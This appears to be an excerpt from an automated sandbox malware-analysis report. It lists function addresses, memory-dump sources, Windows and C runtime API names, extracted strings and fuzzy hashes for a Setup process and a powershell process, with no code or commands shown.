                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                            • API String ID: 3215553584-1196891531
                                                                                                                                                                                                            • Opcode ID: 4e9d8a715f4867a031d96218218279292efbbfaec0b26f01f49837f156af5202
                                                                                                                                                                                                            • Instruction ID: a0b9203b208d8e1d005f5a74769bc3f9914bbcc49fc5b715a21311bf700cd728
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4e9d8a715f4867a031d96218218279292efbbfaec0b26f01f49837f156af5202
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7681A331D0C246E5F7676E2BC2D0B79AA909F23B48FF85071C90DD229DEE5DA8419321
                                                                                                                                                                                                            Function 00007FF764A318CC Relevance: 6.2, APIs: 4, Instructions: 160COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _get_daylight$_isindst
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 4170891091-0
                                                                                                                                                                                                            • Opcode ID: cf2a363d9d9d60bb1fd2b7a7062aad5e5d6dc4d724fe27cc3b8d53810e30cd48
                                                                                                                                                                                                            • Instruction ID: 119f847cd9c8e22103ec47c39000db6f5f0cd03379d26cd29f2ef45a865b8f76
                                                                                                                                                                                                            • Opcode Fuzzy Hash: cf2a363d9d9d60bb1fd2b7a7062aad5e5d6dc4d724fe27cc3b8d53810e30cd48
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1A512C72F04152DAFB15EF66D5C19BCA761AB00399FF44235DE1E93AD5EF38A4018710
                                                                                                                                                                                                            Function 00007FF764A29094 Relevance: 6.2, APIs: 4, Instructions: 159COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo$_get_daylight
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 72036449-0
                                                                                                                                                                                                            • Opcode ID: 287aa2f55fa63f36cf1cebc8650c9ead072f44a6b5d348b2231f5c0341a06890
                                                                                                                                                                                                            • Instruction ID: 9e979df13162c37056f672ed16d7aa086b9fc2c7478e3314bcbc13e9dbe63006
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 287aa2f55fa63f36cf1cebc8650c9ead072f44a6b5d348b2231f5c0341a06890
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5F51B332F0D242E2F7A96D278689B7BF549AB40B14FBD4134CA4D762D5CA3CE840B671
                                                                                                                                                                                                            Function 00007FF764A2723C Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2780335769-0
                                                                                                                                                                                                            • Opcode ID: a45dab95f0394a49ead25b6af34a2d268b91debbe9157e6bb71821f7afc6c7d6
                                                                                                                                                                                                            • Instruction ID: 39e93ccf3df21a09a33144a296c25bc515f911852672e3ca3937c58d5d605955
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a45dab95f0394a49ead25b6af34a2d268b91debbe9157e6bb71821f7afc6c7d6
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5E518026E04641DAFB10EF72D4907BEB3A1BB48B58FA89035DE0D67749DF38D5419360
                                                                                                                                                                                                            Function 00007FF764A1D6C0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 145COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3215553584-3916222277
                                                                                                                                                                                                            • Opcode ID: 31a59f69953ad6651beb5c98be7a4087f1f79095f3204978b48eda0e12909333
                                                                                                                                                                                                            • Instruction ID: f22250dd090d0f8826237d1878d321f7c1e22c25ed5a47ca5c1af6bbca2942ed
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 31a59f69953ad6651beb5c98be7a4087f1f79095f3204978b48eda0e12909333
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F451A5B290C212E6E766AF2AC0C4B7CB7B1EB05B48FB41135C64947294CF2CF485C721
                                                                                                                                                                                                            Function 00007FF764A2D26C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMONLIBRARYCODE
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID: e+000$gfff
                                                                                                                                                                                                            • API String ID: 3215553584-3030954782
                                                                                                                                                                                                            • Opcode ID: c37ddedde2bab3be3496175dc2ceb09d343c47e7f34a0fbb1c1af0881f238d15
                                                                                                                                                                                                            • Instruction ID: 38ec320a69429ecb8f9f887ef12513b8679e4625e01c31f658fb6759f4888271
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c37ddedde2bab3be3496175dc2ceb09d343c47e7f34a0fbb1c1af0881f238d15
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 63512762B187C596E7259F3AD8807AAAB91EB40B90F9C9231C79C47BD6CF2DE044D710
                                                                                                                                                                                                            Function 00007FF764A301D8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMONLIBRARYCODE
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorFileLastWrite
                                                                                                                                                                                                            • String ID: U
                                                                                                                                                                                                            • API String ID: 442123175-4171548499
                                                                                                                                                                                                            • Opcode ID: ab9cbe2d27cd6c4d806ab794c500e1b21e064f73e395fdb04b005935f2142ba3
                                                                                                                                                                                                            • Instruction ID: e3582e68234a51339e57ba78201640dce291b20d4af0f9d33b2112de1d793fd6
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ab9cbe2d27cd6c4d806ab794c500e1b21e064f73e395fdb04b005935f2142ba3
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7741E52271DA45D2DB61EF66E4847AAA760FB99784F904031EE4DC7748EF7CD441C710
                                                                                                                                                                                                            Function 00007FF764A31188 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CurrentDirectory
                                                                                                                                                                                                            • String ID: :
                                                                                                                                                                                                            • API String ID: 1611563598-336475711
                                                                                                                                                                                                            • Opcode ID: 83793ee72428ec04c0e6e49c0f79e4c97abdeece83d9fbc79ef2ba25720c608c
                                                                                                                                                                                                            • Instruction ID: de173e2b58dd554319bdca6f642708ccf9af3cc2e4aa74c651b8eb40e9ff7b45
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 83793ee72428ec04c0e6e49c0f79e4c97abdeece83d9fbc79ef2ba25720c608c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 43219332A08681D1EB21EF56D0C4A7EB3B2FBC4B44FE54135DA4D87684EF7CE9458660
                                                                                                                                                                                                            Function 00007FF764A2B854 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CompareStringtry_get_function
                                                                                                                                                                                                            • String ID: CompareStringEx
                                                                                                                                                                                                            • API String ID: 3328479835-2590796910
                                                                                                                                                                                                            • Opcode ID: f5173eea797c8fd49a83a6dc5d9afa66535d54e1dc730693d7c807f149fd71c2
                                                                                                                                                                                                            • Instruction ID: f8d3b1e9239c113844e61d7c5ee1a8079570500227d2e4dbed6320dae6369a37
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f5173eea797c8fd49a83a6dc5d9afa66535d54e1dc730693d7c807f149fd71c2
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F7114F31608B80C6D760DF16F48069AB764FBC9B90F544136EE8D53B19DF3CD0448B40
                                                                                                                                                                                                            Function 00007FF764A2BAC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Stringtry_get_function
                                                                                                                                                                                                            • String ID: LCMapStringEx
                                                                                                                                                                                                            • API String ID: 2588686239-3893581201
                                                                                                                                                                                                            • Opcode ID: ed83ab2a8ecbd43abeb41e42fb4b1ae0a53301fcdf6a2ccaf8e3005eed8b5591
                                                                                                                                                                                                            • Instruction ID: 719c6b7b7d633010d754a0417d19cda33531f7cec4338d9387728df37616da82
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ed83ab2a8ecbd43abeb41e42fb4b1ae0a53301fcdf6a2ccaf8e3005eed8b5591
                                                                                                                                                                                                            • Instruction Fuzzy Hash: DF111A31608B81D6D760DF16B4806AAB7A4FBD9B90F944135EE8D93B59DF3CD5448B00
                                                                                                                                                                                                            Function 00007FF764A17A14 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: wprintf
                                                                                                                                                                                                            • String ID: Expanded wildcards: before: "%s" after : "%s"$_JAVA_LAUNCHER_DEBUG
                                                                                                                                                                                                            • API String ID: 3614878089-730970534
                                                                                                                                                                                                            • Opcode ID: b2a58926cf1f4fb6458666ac0aceca35dec4c9ddd74ffebdec84f0f40e04f2fd
                                                                                                                                                                                                            • Instruction ID: 3b9816abb708a1df45037667fed3358c9db732672263523dd9166831f6adfbd6
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b2a58926cf1f4fb6458666ac0aceca35dec4c9ddd74ffebdec84f0f40e04f2fd
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7AF06214F09752E0ED02BF13E6D197997619F45BC4FE46034ED0D4BB86EE2CE1428350
                                                                                                                                                                                                            Function 00007FF764A35F6C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID: :
                                                                                                                                                                                                            • API String ID: 3215553584-336475711
                                                                                                                                                                                                            • Opcode ID: c1babc72da362b93fe99a1e6373bb2c622cae6ce3b5b9b1ac86d1823f73ca5e7
                                                                                                                                                                                                            • Instruction ID: cc22d389cce760b971ec31ba0a16c1c64a04eb3271130083585330d58fbbccf6
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c1babc72da362b93fe99a1e6373bb2c622cae6ce3b5b9b1ac86d1823f73ca5e7
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1801A22191C246D2F721BFA6E4D1A7EF3A0EF48304FE41135EA4E86795EF2CE1048A24
                                                                                                                                                                                                            Function 00007FF764A2BA5C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • try_get_function.LIBVCRUNTIME ref: 00007FF764A2BA8D
                                                                                                                                                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00000030,00007FF764A2F5F4,?,?,00000000,00007FF764A2F8A9,?,?,00000000,00000000,00008000,00007FF764A29566), ref: 00007FF764A2BAA7
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                                                                                                                                                                            • String ID: InitializeCriticalSectionEx
                                                                                                                                                                                                            • API String ID: 539475747-3084827643
                                                                                                                                                                                                            • Opcode ID: 121c09a281781e80721105d7d94d03218607644482c6d9c5b1dc19ab7cdcd2aa
                                                                                                                                                                                                            • Instruction ID: 551caf39e4c37c72d0aae2075685dc34af284dc985ade5bd4a1ed1f4effb0258
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 121c09a281781e80721105d7d94d03218607644482c6d9c5b1dc19ab7cdcd2aa
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 79F05421A18641E2E645AF43E5808AAA221BF88B80FE84135E95D13B54DF3CE859D760
                                                                                                                                                                                                            Function 00007FF764A2BA08 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • try_get_function.LIBVCRUNTIME ref: 00007FF764A2BA31
                                                                                                                                                                                                            • TlsSetValue.KERNEL32(?,?,00000000,00007FF764A2CCB2,?,?,00000000,00007FF764A26825,?,?,?,?,00007FF764A2A502,?,?,00000001), ref: 00007FF764A2BA48
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Valuetry_get_function
                                                                                                                                                                                                            • String ID: FlsSetValue
                                                                                                                                                                                                            • API String ID: 738293619-3750699315
                                                                                                                                                                                                            • Opcode ID: 075e012088bc129b343f0eccdaf156853e335ef898808b6c750f3ffbbb915d4c
                                                                                                                                                                                                            • Instruction ID: 5833a85511acf15774f88d2212c1e022309816ee18bed5338744c8a475464884
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 075e012088bc129b343f0eccdaf156853e335ef898808b6c750f3ffbbb915d4c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F2E06C61A1C542F3E6456F53F5C18F5A222AF48740FEC4135D91D16254DE3CE858D320

                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                            Function 04CA3FA0 Relevance: 7.0, Strings: 5, Instructions: 733COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 0000000E.00000002.2588036355.0000000004CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_4ca0000_powershell.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: m^$m^$m^$m^$m^
                                                                                                                                                                                                            • API String ID: 0-393609038
                                                                                                                                                                                                            • Opcode ID: 33393c7a48986e39a9b360c931a97d541791fff4daceedbe6252437910e5a343
                                                                                                                                                                                                            • Instruction ID: 5a69a5f2b03007734cc2ec3bf4ca519ba535d157457ea651159c5f76f8c0b7b9
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 33393c7a48986e39a9b360c931a97d541791fff4daceedbe6252437910e5a343
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C052F170A093868FC706CF6CC8A49AABFB1EF4A314B1945D6D484DB263C734EC55CBA5
                                                                                                                                                                                                            Function 077E1518 Relevance: 5.6, Strings: 4, Instructions: 580COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 0000000E.00000002.2612717669.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_77e0000_powershell.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                                                                                                                                                            • API String ID: 0-1420252700
                                                                                                                                                                                                            • Opcode ID: a7790dc169526b0659d482a1475abe565643168f1e876078b75cebe42a282da5
                                                                                                                                                                                                            • Instruction ID: 5ba44cdc52728e5918f59558fbec248e1f121f67562c1eb00b7e2bc043e1a83c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a7790dc169526b0659d482a1475abe565643168f1e876078b75cebe42a282da5
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A41238B1B003499FCB159B6D881277ABBEAAFCA390F54887AD405CB351DB31CD45C792
                                                                                                                                                                                                            Function 077E14FC Relevance: .1, Instructions: 121COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 0000000E.00000002.2612717669.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
